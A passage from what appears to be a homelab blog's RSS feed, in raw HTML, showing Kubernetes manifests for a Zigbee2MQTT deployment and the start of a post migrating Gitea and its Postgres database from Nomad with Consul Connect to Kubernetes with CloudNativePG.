</span></span><span style="display:flex;"><span>        <span style="color:#f92672">ZIGBEE2MQTT_CONFIG_FRONTEND_AUTH_TOKEN</span>: <span style="color:#e6db74">&#34;{{ `{{ .auth }}` }}&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">ZIGBEE2MQTT_CONFIG_MQTT_PASSWORD</span>: <span style="color:#e6db74">&#34;{{ `{{ .mqtt }}` }}&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">ZIGBEE2MQTT_CONFIG_ADVANCED_NETWORK_KEY</span>: <span style="color:#e6db74">&#34;[{{ `{{ .network }}` }}]&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">data</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">secretKey</span>: <span style="color:#ae81ff">auth</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">remoteRef</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">key</span>: <span style="color:#ae81ff">my-secrets/iot/zigbee2mqtt/auth</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">property</span>: <span style="color:#ae81ff">secret</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">secretKey</span>: <span style="color:#ae81ff">mqtt</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">remoteRef</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">key</span>: <span style="color:#ae81ff">my-secrets/iot/zigbee2mqtt/mqtt</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">property</span>: <span style="color:#ae81ff">secret</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">secretKey</span>: <span style="color:#ae81ff">network</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">remoteRef</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">key</span>: <span style="color:#ae81ff">my-secrets/iot/zigbee2mqtt/network-key</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">property</span>: <span style="color:#ae81ff">secret</span>
</span></span></code></pre></div><p>The complicated part of the Zigbee2MQTT deployment is the configuration file,
because sadly, Zigbee2MQTT is one of those applications that need write access
to their configuration file. That makes using a ConfigMap complicated,
because those are always mounted read-only. In the case of Zigbee2MQTT, I don&rsquo;t
really care about the content changes it makes - I can just deploy my original
file over it without an issue. But Zigbee2MQTT won&rsquo;t even start if it can&rsquo;t
write to the config file.</p>
<p>First, the config map itself:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">ConfigMap</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">zigbee2mqtt</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">data</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">configuration.yaml</span>: |<span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    version: 4
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    homeassistant:
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      enabled: false
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    permit_join: false
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    frontend:
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      enabled: true
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    mqtt:
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      base_topic: zigbee2mqtt
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      server: &#39;mqtts://{{ .Values.mqttHost }}:443&#39;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      user: foo
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      client_id: &#34;foobar&#34;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    # Serial settings
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    serial:
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      port: &#39;tcp://my-zigbee-bridge:1234&#39;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      adapter: zstack
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    advanced:
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      channel: 23
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      log_output:
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        - console
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    devices:
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      &#39;0x123&#39;:
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        friendly_name: &#39;temp/sonoff/thermo1&#39;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        icon: device_icons/bdc2692122548ad0f2b0fb6c9f10a93d.png
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      &#39;0x456&#39;:
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        friendly_name: &#39;temp/sonoff/thermo2&#39;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        icon: device_icons/bdc2692122548ad0f2b0fb6c9f10a93d.png</span>
</span></span></code></pre></div><p>When new devices are connected, Zigbee2MQTT adds them to the <code>devices:</code> map, and
I then just add them to the ConfigMap manually.</p>
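<p>Just as an illustration, a newly paired device shows up as one more entry in that
map; the address and friendly name below are made up:</p>
<pre tabindex="0"><code>devices:
  &#39;0x789&#39;:
    friendly_name: &#39;temp/sonoff/thermo3&#39;
    icon: device_icons/bdc2692122548ad0f2b0fb6c9f10a93d.png
</code></pre>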
<p>But how to handle the fact that this config file needs to be writable?
Init containers. Up to now, I&rsquo;ve been living in blissful ignorance of
such hacks, but that streak of good fortune had to end at some point. I just
find it so incredibly ugly. Look at it:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">apps/v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Deployment</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">zigbee2mqtt</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">replicas</span>: <span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">selector</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">matchLabels</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">homelab/app</span>: <span style="color:#ae81ff">zigbee2mqtt</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">strategy</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">type</span>: <span style="color:#e6db74">&#34;Recreate&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">template</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">homelab/app</span>: <span style="color:#ae81ff">zigbee2mqtt</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">annotations</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">checksum/config</span>: {{ <span style="color:#ae81ff">include (print $.Template.BasePath &#34;/z2m-config.yaml&#34;) . | sha256sum }}</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">securityContext</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">fsGroup</span>: <span style="color:#ae81ff">1000</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">initContainers</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">zigbee2mqtt-init</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">image</span>: <span style="color:#ae81ff">alpine:3.21.2</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">volumeMounts</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">data</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">mountPath</span>: <span style="color:#ae81ff">/data</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">config</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">mountPath</span>: <span style="color:#ae81ff">/config</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">command</span>: [<span style="color:#e6db74">&#34;cp&#34;</span>, <span style="color:#e6db74">&#34;/config/configuration.yaml&#34;</span>, <span style="color:#e6db74">&#34;/data/configuration.yaml&#34;</span>]
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">containers</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">zigbee2mqtt</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">image</span>: <span style="color:#ae81ff">koenkk/zigbee2mqtt:{{ .Values.zigbee2mqttVersion }}</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">volumeMounts</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">data</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">mountPath</span>: <span style="color:#ae81ff">/app/data</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">resources</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">requests</span>:
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">cpu</span>: <span style="color:#ae81ff">200m</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">memory</span>: <span style="color:#ae81ff">200Mi</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">envFrom</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">secretRef</span>:
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">name</span>: <span style="color:#ae81ff">zigbee2mqtt</span>
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">optional</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">ports</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">web</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">containerPort</span>: {{ <span style="color:#ae81ff">.Values.ports.z2m }}</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">protocol</span>: <span style="color:#ae81ff">TCP</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">volumes</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">data</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">persistentVolumeClaim</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">claimName</span>: <span style="color:#ae81ff">z2m-volume</span>
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">config</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">configMap</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">name</span>: <span style="color:#ae81ff">zigbee2mqtt</span>
</span></span></code></pre></div><p>I&rsquo;m launching an entirely separate container just to run a single <code>cp</code> command to
copy the mounted ConfigMap into the data volume. I wish we had some better way
to do something like this. But it seems we don&rsquo;t.</p>
<p>And that&rsquo;s it for this one. I think wherever possible, I will keep the future
migration posts in this format, not explaining every single line of every single
Yaml file anymore, but only pointing out interesting things like the issue
with the Mosquitto credentials in this one. It&rsquo;s more interesting to write and
I hope more interesting to read than the umpteenth re-explanation of my CNPG
DB setup.</p>
<p>Next up will be my Jellyfin media server. The copying of my media collection
is already done, and hopefully I will get the actual migration completed today.
That one will contain a lot of Grafana plots and Ceph performance musings. &#x1f913;</p>
]]></content:encoded>
    </item>
    <item>
      <title>Nomad to k8s, Part 16: Migrating Gitea</title>
      <link>https://blog.mei-home.net/posts/k8s-migration-16-gitea/</link>
      <pubDate>Fri, 07 Feb 2025 22:50:37 +0100</pubDate>
      <guid>https://blog.mei-home.net/posts/k8s-migration-16-gitea/</guid>
      <description>Migrating my Gitea instance from Nomad to Kubernetes</description>
      <content:encoded><![CDATA[<p>Wherein I migrate my Gitea instance from Nomad to k8s.</p>
<p>This is part 17 of my <a href="https://blog.mei-home.net/tags/k8s-migration/">k8s migration series</a>.</p>
<p>I&rsquo;ve been using <a href="https://about.gitea.com/">Gitea</a> as my Git forge for a while
now. What&rsquo;s now the Gitea instance started life as a <a href="https://github.com/gogs/gogs">Gogs</a>
instance in 2016, when I had to downsize my Homelab to a Raspberry Pi 3B that
couldn&rsquo;t handle all the things I wanted to run on it. I decided to get rid of
my Gitlab instance and exchange it for Gogs. The switch back to Gitea then
happened because Gitlab started eating 12% of my new home server&rsquo;s CPU even
when idle.</p>
<p>This is what the front page looks like when logged in:
<figure>
    <img loading="lazy" src="gitea_frontpage.png"
         alt="A screenshot of the Gitea home page for a logged in user. At the top is a heat map, similar to the one on GitHub&#39;s user profile page. It shows a brighter color for days with a lot of activity, and a lighter color for days with less activity. It shows a full year&#39;s worth of activity, showing one colored box per day, with columns for weeks and rows for days of the week. My activity shows almost all weekend days with activity, while the winter months also show lots of activity on workdays. Below the heat map is an activity feed, showing activities from the last couple of days, like pushes to different repositories. Most of them are to the adm/homelab and mmeier/blog repository. On the right side is a list of repositories, showing ones like &#39;adm/homenet-docs&#39;, &#39;mmeier/smokes.cli&#39; or &#39;learning/learning-go&#39;. Next to some of them is a green check mark or a red cross, indicating the state of the last CI pipeline."/> <figcaption>
            <p>Screenshot of Gitea&rsquo;s home page for my user.</p>
        </figcaption>
</figure>
</p>
<p>I&rsquo;m quite liking it and, in contrast to Gitlab, I never had any problems with it.
It&rsquo;s pretty snappy (again, especially in contrast to Gitlab) and relatively light
on resources. Most of the time I can&rsquo;t even tell whether it got assigned one
of my beefier x86 nodes or a Raspberry Pi.</p>
<p>I&rsquo;ve got 82 repositories stored in it, from relatively small dead projects which
never got much farther than a README to extremely large repos containing 3D
models and such for a <a href="https://www.sinsofasolarempire1.com/">Sins of a Solar Empire</a>
mod I was once involved in. Most repos don&rsquo;t see a lot of activity and I&rsquo;m the
only user at the moment. The instance is not publicly accessible, but I might
change that when the <a href="https://forgefed.org/">ForgeFed</a> project matures.</p>
<p>My way of working depends on the repository. For my Homelab, this blog and my
Homelab docs for example I&rsquo;m just pushing to the master branch. (Which again
reminds me to finally get around to the <code>main</code> branch migration.)
In my development projects though I&rsquo;m mostly working with Pull Requests. I find
Gitea&rsquo;s interface pretty convenient, and like seeing all the information and
CI runs for a specific feature in one place.</p>
<p>So I&rsquo;m not using too many actual features of Gitea, it&rsquo;s mainly a convenient UI
for my Git repos. But I must admit: I&rsquo;m rather fond of that activity heat map.
The only Gitlab feature I&rsquo;m genuinely missing is the repository stats. If any
of you know a good web app, either dynamic or statically generated, that can
show stats on a Git repo, I&rsquo;d be very interested.</p>
<h2 id="database-setup-and-migration">Database setup and migration</h2>
<p>I promise, this is the last time one of my migration articles will have a
long-winded section on databases. &#x1f609;
But in this case, it&rsquo;s warranted, because this is the first time I&rsquo;m actually
migrating a database, instead of setting up a new one.</p>
<p>I&rsquo;m using <a href="https://cloudnative-pg.io/">CloudNativePG</a> to manage the Postgres
databases in my k8s cluster. More details can be found <a href="https://blog.mei-home.net/posts/k8s-migration-8-cloud-native-pg/">here</a>.
CNPG has a number of methods for seeding a new DB cluster with data. Generally,
those approaches are split into two. The first way involves another online cluster
and full replication or restoration of a backup.
The second method is more suited to what I needed, namely a one-time import
from another cluster using <code>initdb</code> to bootstrap the CNPG cluster.
It uses <code>pg_dump</code>/<code>pg_restore</code> against another running cluster, which
suited me well because my Nomad Postgres setup is still up and
running. The docs for this method can be found <a href="https://cloudnative-pg.io/documentation/1.25/database_import/">here</a>.</p>
<p>There was just one problem: In Nomad, I&rsquo;m using <a href="https://developer.hashicorp.com/consul/docs/connect">Consul Connect Service Mesh</a>
to connect services and only allow access between specific services instead of
having open ports everywhere. This has been working pretty nicely in the past
several years. Remember, I&rsquo;m switching away from HashiCorp&rsquo;s stuff not because
their software is bad, but rather for ideological reasons.</p>
<p>But in this instance, I was stumped. For using <code>pg_dump</code>, CNPG needs access
to the other cluster. But of course no k8s service is currently inside the
Consul Mesh, so there&rsquo;s no way to access the Postgres DB. I thought: Well, I
can just open up a node port temporarily. And I failed. As in: I spent an entire
evening trying to figure this out and had to give up. For reference, the
network config for my Postgres Nomad job looks like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-hcl" data-lang="hcl"><span style="display:flex;"><span>  <span style="color:#66d9ef">group</span> <span style="color:#e6db74">&#34;postgres&#34;</span> {
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">network</span> {
</span></span><span style="display:flex;"><span>      mode <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;bridge&#34;</span>
</span></span><span style="display:flex;"><span>    }
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">service</span> {
</span></span><span style="display:flex;"><span>      name <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;postgres&#34;</span>
</span></span><span style="display:flex;"><span>      port <span style="color:#f92672">=</span> <span style="color:#ae81ff">5432</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>      <span style="color:#66d9ef">connect</span> {
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">sidecar_service</span> {}
</span></span><span style="display:flex;"><span>      }
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>      <span style="color:#66d9ef">check</span> {
</span></span><span style="display:flex;"><span>        type     <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;script&#34;</span>
</span></span><span style="display:flex;"><span>        command  <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;/usr/bin/pg_isready&#34;</span>
</span></span><span style="display:flex;"><span>        args     <span style="color:#f92672">=</span> [<span style="color:#e6db74">&#34;-U&#34;, &#34;postgres&#34;</span>]
</span></span><span style="display:flex;"><span>        interval <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;30s&#34;</span>
</span></span><span style="display:flex;"><span>        timeout  <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;2s&#34;</span>
</span></span><span style="display:flex;"><span>        task     <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;postgres&#34;</span>
</span></span><span style="display:flex;"><span>      }
</span></span><span style="display:flex;"><span>    }
</span></span><span style="display:flex;"><span>[...]
</span></span></code></pre></div><p>With that config, Consul launches an <a href="https://www.envoyproxy.io/">Envoy</a> container
next to the Postgres container in the network namespace, by default on a random
port. Inside the network namespace, Postgres&rsquo; <code>5432</code> port is connected to Envoy.
Envoy then listens on a public port, but only lets through connections with the
right mTLS cert. Other services can then be allowed to access Postgres via
their own Envoy proxy. As best as I&rsquo;ve been able to figure out, there&rsquo;s no
way for a service outside the mesh to get through the Envoy proxy to the
Postgres port.</p>
<p>But opening another port also did not work. I&rsquo;m reasonably sure that&rsquo;s because
trying to connect Postgres&rsquo; socket to two other sockets (the temporary public one, and Envoy&rsquo;s)
is just not something that can ever work. I still tried though. Pretty hard
even.</p>
<p>But in the end I threw up my hands and had to admit that I was trying something
that&rsquo;s simply not possible. I could either have that port accessible on the node,
or via the Consul Mesh, but not both.</p>
<p>I also couldn&rsquo;t just temporarily switch off the Consul Mesh for Postgres, because
that would have impacted other workloads on my Nomad cluster. Took me quite a
while to come up with the solution: I remembered that, during my initial migration
to Nomad from my Docker Compose setup, I had set up an <a href="https://developer.hashicorp.com/consul/docs/connect/gateways/ingress-gateway">Ingress Gateway</a>
to provide access to the already migrated services from the apps still running
in Docker Compose.
That Ingress Gateway does pretty much what it says on the tin: It allows services
from outside the mesh access to services inside the mesh. It was of course not
as fine-grained as the service mesh itself. If a service could reach the gateway,
it could access all services inside the mesh that the gateway was allowed to
access.</p>
<p>Luckily, by the time I originally set up the Ingress Gateway, I had already
started to put my Homelab under version control, and I was still able to find
the old Ingress Gateway definition. I pared it down to only Postgres, and the
Nomad job ended up looking like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-hcl" data-lang="hcl"><span style="display:flex;"><span><span style="color:#66d9ef">job</span> <span style="color:#e6db74">&#34;ingress-gateways&#34;</span> {
</span></span><span style="display:flex;"><span>  datacenters <span style="color:#f92672">=</span> [<span style="color:#e6db74">&#34;homenet&#34;</span>]
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">group</span> <span style="color:#e6db74">&#34;internal&#34;</span> {
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">network</span> {
</span></span><span style="display:flex;"><span>      mode <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;bridge&#34;</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>      <span style="color:#66d9ef">port</span> <span style="color:#e6db74">&#34;postgres&#34;</span> {
</span></span><span style="display:flex;"><span>        static <span style="color:#f92672">=</span> <span style="color:#ae81ff">5577</span>
</span></span><span style="display:flex;"><span>        to <span style="color:#f92672">=</span> <span style="color:#ae81ff">5577</span>
</span></span><span style="display:flex;"><span>      }
</span></span><span style="display:flex;"><span>    }
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">service</span> {
</span></span><span style="display:flex;"><span>      name <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;ingress-internal&#34;</span>
</span></span><span style="display:flex;"><span>      port <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;8080&#34;</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>      <span style="color:#66d9ef">connect</span> {
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">gateway</span> {
</span></span><span style="display:flex;"><span>          <span style="color:#66d9ef">ingress</span> {
</span></span><span style="display:flex;"><span>            <span style="color:#66d9ef">listener</span> {
</span></span><span style="display:flex;"><span>              port <span style="color:#f92672">=</span> <span style="color:#ae81ff">5577</span>
</span></span><span style="display:flex;"><span>              protocol <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;tcp&#34;</span>
</span></span><span style="display:flex;"><span>              <span style="color:#66d9ef">service</span> {
</span></span><span style="display:flex;"><span>                name <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;postgres&#34;</span>
</span></span><span style="display:flex;"><span>              }
</span></span><span style="display:flex;"><span>            }
</span></span><span style="display:flex;"><span>          }
</span></span><span style="display:flex;"><span>        }
</span></span><span style="display:flex;"><span>      }
</span></span><span style="display:flex;"><span>    }
</span></span><span style="display:flex;"><span>  }
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p>This definition starts by setting up a bridged network namespace, meaning no
outside access by default. Then it creates a listener for Postgres. With that,
the Envoy proxy of the service would create a socket at port <code>5577</code> in the
namespace, connected to the Postgres service&rsquo;s Envoy proxy. The gateway would
also open a static port on <code>5577</code> on the node it is running on, which would
be connected to port <code>5577</code> inside the network namespace. And with that,
any service connecting to port <code>5577</code> on the host running the Ingress Gateway
would be connected to the Postgres database. Pretty neat and simple setup,
but took me a while to remember.</p>
<p>I ran test connections with this command to confirm that I finally had
external access to the cluster:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>psql -U gogs -h ingress-internal.service.consul -p <span style="color:#ae81ff">5577</span> -d gitea
</span></span></code></pre></div><p>With that, I finally had access to the Postgres cluster from inside my k8s
cluster.</p>
<p>The CNPG Cluster manifest then looks like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">postgresql.cnpg.io/v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Cluster</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">gitea-pg-cluster</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">homelab/part-of</span>: <span style="color:#ae81ff">gitea</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">instances</span>: <span style="color:#ae81ff">2</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">imageName</span>: <span style="color:#e6db74">&#34;ghcr.io/cloudnative-pg/postgresql:17.2&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">bootstrap</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">initdb</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">database</span>: <span style="color:#ae81ff">gitea</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">owner</span>: <span style="color:#ae81ff">gitea</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">import</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">type</span>: <span style="color:#ae81ff">microservice</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">databases</span>:
</span></span><span style="display:flex;"><span>          - <span style="color:#ae81ff">gitea</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">source</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">externalCluster</span>: <span style="color:#ae81ff">nomad-pg</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">resources</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">requests</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">memory</span>: <span style="color:#ae81ff">200M</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">cpu</span>: <span style="color:#ae81ff">150m</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">postgresql</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">parameters</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">max_connections</span>: <span style="color:#e6db74">&#34;200&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">shared_buffers</span>: <span style="color:#e6db74">&#34;50MB&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">effective_cache_size</span>: <span style="color:#e6db74">&#34;150MB&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">maintenance_work_mem</span>: <span style="color:#e6db74">&#34;12800kB&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">checkpoint_completion_target</span>: <span style="color:#e6db74">&#34;0.9&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">wal_buffers</span>: <span style="color:#e6db74">&#34;1536kB&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">default_statistics_target</span>: <span style="color:#e6db74">&#34;100&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">random_page_cost</span>: <span style="color:#e6db74">&#34;1.1&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">effective_io_concurrency</span>: <span style="color:#e6db74">&#34;300&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">work_mem</span>: <span style="color:#e6db74">&#34;128kB&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">huge_pages</span>: <span style="color:#e6db74">&#34;off&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">max_wal_size</span>: <span style="color:#e6db74">&#34;128MB&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">wal_keep_size</span>: <span style="color:#e6db74">&#34;512MB&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">storage</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">size</span>: <span style="color:#ae81ff">1.</span><span style="color:#ae81ff">5G</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">storageClass</span>: <span style="color:#ae81ff">rbd-fast</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">backup</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">barmanObjectStore</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">endpointURL</span>: <span style="color:#ae81ff">http://rook-ceph-rgw-rgw-bulk.rook-cluster.svc:80</span>
